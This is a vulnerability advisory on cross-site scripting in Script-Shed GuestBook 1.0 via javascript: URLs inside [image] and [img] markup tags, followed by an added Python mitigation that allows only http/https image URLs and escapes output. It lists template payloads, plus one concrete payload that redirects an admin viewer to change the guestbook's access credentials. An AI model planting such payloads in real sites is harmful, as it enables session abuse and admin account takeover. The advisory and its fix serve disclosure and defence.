[Original text] Cross-site scripting (XSS) vulnerability in configure.asp in Script-Shed GuestBook 1.0 allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in (1) image, (2) img, (3) image=right, (4) img=right, (5) image=left, and (6) img=left tags.
source: http://www.securityfocus.com/bid/5915/info
SSGbook supports markup codes that let users specify HTML formatting and layout inside guestbook entries. For example, a user can include an image by placing it inside [image] or [img] tags. However, arbitrary HTML and script code is not sufficiently sanitized within these tags.
As a result, users may include malicious HTML and script code inside of guestbook entries. The attacker-supplied code will be rendered in the web client of a user who views a malicious guestbook entry.
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
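On the mitigation side, the following is an added example (not SSGbook code and not part of the original advisory) of rendering the six tag forms above with a URL scheme allowlist and output escaping. The function names, the http/https allowlist and the choice to escape all text outside the tags are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# The six tag forms listed in the advisory: [image]/[img], optionally =left or =right.
TAG_RE = re.compile(
    r"\[(image|img)(?:=(left|right))?\](.*?)\[/\1(?:=\2)?\]",
    re.IGNORECASE | re.DOTALL,
)
ALLOWED_SCHEMES = {"http", "https"}  # assumption: only remote web images are wanted


def is_safe_image_url(url):
    """Allow only absolute http(s) URLs with a host and no whitespace/control chars."""
    if not url or any(c.isspace() or ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def render_entry(text):
    """Render a guestbook entry: escape everything, emit <img> only for vetted URLs."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        align, url = m.group(2), m.group(3).strip()
        if is_safe_image_url(url):
            attr = f' align="{align.lower()}"' if align else ""
            out.append(f'<img src="{html.escape(url, quote=True)}"{attr} alt="">')
        else:
            # Rejected markup is shown as inert, escaped text instead of a tag.
            out.append(html.escape(m.group(0)))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample input; {SCRIPT} is the advisory's own placeholder.
    sample = "Hi [img=right]javascript:{SCRIPT}[/img=right] [img]https://example.com/a.png[/img]"
    print(render_entry(sample))
```

The check is an allowlist, so any scheme other than http or https is refused without having to enumerate dangerous ones.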